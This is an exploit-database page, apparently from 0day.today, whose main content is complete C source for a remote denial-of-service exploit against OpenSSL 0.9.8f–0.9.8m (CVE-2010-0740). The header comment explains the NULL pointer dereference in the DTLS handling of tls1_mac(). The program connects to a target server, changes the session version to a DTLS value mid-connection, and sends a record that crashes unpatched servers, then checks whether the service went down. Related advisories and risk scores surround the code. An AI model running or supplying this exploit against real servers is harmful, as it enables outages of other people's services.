OpenSSL remote Denial of Service

🗓️ 22 Apr 2010 00:00:00Reported by n/aType

zdt🔗 0day.today👁 28 Views

OpenSSL remote Denial of Service-exploit in SSL/TLS vulnerabilit

Reporter	Title	Published	Views	Family All 99
ALT Linux	Security fix for the ALT Linux 6 package openssl10 version 0.9.8n-alt1	25 Mar 201000:00	–	altlinux
ALT Linux	Security fix for the ALT Linux 9 package openssl10 version 0.9.8n-alt1	25 Mar 201000:00	–	altlinux
ALT Linux	Security fix for the ALT Linux 8 package openssl10 version 0.9.8n-alt1	25 Mar 201000:00	–	altlinux
ALT Linux	Security fix for the ALT Linux 9 package openssl1.1 version 0.9.8n-alt1	25 Mar 201000:00	–	altlinux
Tenable Nessus	OpenSSL < 0.9.8n Multiple Vulnerabilities	26 Mar 201000:00	–	nessus
Tenable Nessus	Mac OS X 10.6 < 10.6.8 Multiple Vulnerabilities	23 Jun 201100:00	–	nessus
Tenable Nessus	Mac OS X 10.6 < 10.6.8 Multiple Vulnerabilities	23 Jun 201100:00	–	nessus
Tenable Nessus	OpenSSL < 0.9.8n Multiple Vulnerabilities	26 Mar 201000:00	–	nessus
Tenable Nessus	AIX OpenSSL Advisory : openssl_advisory.asc	16 Apr 201400:00	–	nessus
Tenable Nessus	F5 Networks BIG-IP : OpenSSL vulnerability (SOL11533)	10 Oct 201400:00	–	nessus

================================
OpenSSL remote Denial of Service
================================


/***********************************************************
 * hoagie_openssl_record_of_death.c
 * OPENSSL REMOTE DENIAL-OF-SERVICE EXPLOIT
 * - OpenSSL 0.9.8m (short = 16 bit)
 * - OpenSSL 0.9.8f through 0.9.8m (short != 16 bit)
 *
 * CVE-2010-0740
 * http://openssl.org/news/secadv_20100324.txt
 *
 * The main problem is in ssl/t1_enc.c => tls1_mac() function
 *
 * - OpenSSL 0.9.8m
 *         if (ssl->version == DTLS1_BAD_VER ||
 *           (ssl->version == DTLS1_VERSION && ssl->client_version != DTLS1_BAD_VER))
 *               {
 *               unsigned char dtlsseq[8],*p=dtlsseq;
 *               s2n(send?ssl->d1->w_epoch:ssl->d1->r_epoch, p);
 *
 * - OpenSSL 0.9.8f - 0.9.8n
 *         if (ssl->version == DTLS1_VERSION && ssl->client_version != DTLS1_BAD_VER)
 *               {
 *               unsigned char dtlsseq[8],*p=dtlsseq;
 *
 *               s2n(send?ssl->d1->w_epoch:ssl->d1->r_epoch, p);
 *
 * There is a NULL pointer dereference => ssl->d1 because d1 is only initialized in
 * ssl/d1_lib.c => dtls1_new(). So if you use SSLv23_server_method() or
 * TLSv1_server_method() this variable will be NULL.
 *
 * If the patch (see http://openssl.org/news/secadv_20100324.txt) is not applied
 * its possible to set the version to DTLS1_BAD_VER (0x100) or DTLS_VERSION (0xfeff)
 * and transmit the packet to the server or client to trigger the vulnerability.
 *
 * When you are using OpenSSL 0.9.8m you can send DTLS1_BAD_VER because 0x100 is not
 * a problem with signed/unsigned.
 *
 * If you are using OpenSSL 0.9.8f to 0.9.8n you have to trigger the vulnerability
 * via DTLS1_VERSION. In that case version will be 0xfffffeff. So it doesnt work
 * if DTLS1_VERSION is 16 bit.
 *
 * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
 * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
 * DAMAGE DONE USING THIS PROGRAM.
 *
 * VOID.AT Security
 * [email protected]
 * http://www.void.at
 *
 ************************************************************/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <openssl/ssl.h>
 
/* usage
 * display help screen
 */
void usage(int argc, char **argv) {
   fprintf(stderr,
           "usage: %s [-h] [-v] [-d <host>] [-p <port>]\n"
           "\n"
           "-h        help\n"
           "-v        verbose\n"
           "-d host   SSL server\n"
           "-p port   SSL port\n"
           "-t target\n"
           "   0 ... OpenSSL 0.9.8m (short = 16 bit) - default\n"
           "   1 ... OpenSSL 0.9.8f through 0.9.8m (short != 16 bit)\n"
           ,
           argv[0]);
   exit(1);
}
 
/* connect_to
 * connect to remote http server
 */
int connect_to(char *host, int port) {
   struct sockaddr_in s_in;
   struct hostent *he;
   int s;
 
   if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
      return -1;
   }
 
   memset(&s_in, 0, sizeof(s_in));
   s_in.sin_family = AF_INET;
   s_in.sin_port = htons(port);
 
   if ( (he = gethostbyname(host)) != NULL)
       memcpy(&s_in.sin_addr, he->h_addr, he->h_length);
   else {
       if ( (s_in.sin_addr.s_addr = inet_addr(host) ) < 0) {
          return -3;
       }
   }
 
   if (connect(s, (struct sockaddr *)&s_in, sizeof(s_in)) == -1) {
      return -4;
   }
 
   return s;
}
 
/* ssl_connect_to
 * establish ssl connection over tcp connection
 */
SSL *ssl_connect_to(int s) {
   SSL *ssl;
   SSL_CTX *ctx;
   BIO *sbio;
   SSL_METHOD *meth;
 
   CRYPTO_malloc_init();
   SSL_load_error_strings();
   SSL_library_init();
 
   // meth = TLSv1_client_method();
   meth = SSLv23_client_method();
   ctx = SSL_CTX_new(meth);
   ssl = SSL_new(ctx);
   sbio = BIO_new_socket(s, BIO_NOCLOSE);
   SSL_set_bio(ssl, sbio, sbio);
 
   if (SSL_connect(ssl) <= 0) {
      return NULL;
   }
 
   return ssl;
}
 
 
int main(int argc, char **argv) {
   struct sockaddr_in s_in;
   struct hostent *he;
   char data[1024];
 
   int s;
   int target = 0;
   char c;
   char *destination = NULL;
   int port = 0;
   SSL *ssl = NULL;
 
   fprintf(stderr,
           "hoagie_openssl_record_of_death.c - openssl ssl3_get_record() remote\n"
           "-andi / void.at\n\n");
 
   if (argc < 2) {
      usage(argc, argv);
   } else {
      while ((c = getopt (argc, argv, "hd:p:t:")) != EOF) {
         switch (c) {
            case 'h':
                 usage(argc, argv);
                 break;
            case 'd':
                 destination = optarg;
                 break;
            case 'p':
                 port = atoi(optarg);
                 break;
            case 't':
                 target = atoi(optarg);
                 break;
         }
      }
 
      if (!destination || !port) {
         fprintf(stderr, "[*] destination and/or port missing\n");
      } else if (target && target != 1) {
         fprintf(stderr, "[*] invalid target '%d'\n", target);
      } else {
         s = connect_to(destination, port);
         if (s > 0) {
            fprintf(stderr, "[+] tcp connection to '%s:%d' successful\n", destination, port);
            ssl = ssl_connect_to(s);
            if (ssl) {
               fprintf(stderr, "[+] ssl connection to '%s:%d' successful\n", destination, port);
               snprintf(data, sizeof(data), "GET / HTTP/1.0\r\n\r\n");
 
               fprintf(stderr, "[+] sending first packet ...\n");
               SSL_write(ssl, data, strlen(data));
 
               if (!target) {
                  ssl->version = DTLS1_BAD_VER;
               } else {
                  ssl->version = DTLS1_VERSION;
               }
 
               fprintf(stderr, "[+] sending second paket ...\n");
               SSL_write(ssl, data, strlen(data));
 
               SSL_shutdown(ssl);
               close(s);
 
               sleep(1);
 
               s = connect_to(destination, port);
               if (s > 0) {
                  fprintf(stderr, "[-] exploit failed\n");
                  close(s);
               } else {
                  fprintf(stderr, "[+] exploit successful\n");
               }
            } else {
               fprintf(stderr, "[-] ssl connection to '%s:%d' failed\n", destination, port);
            }
         } else {
            fprintf(stderr, "[-] tcp connection to '%s:%d' failed\n", destination, port);
         }
      }
   }
    
   return 0;
}



#  0day.today [2018-02-15]  #

22 Apr 2010 00:00Current

7High risk

Vulners AI Score7

EPSS0.15469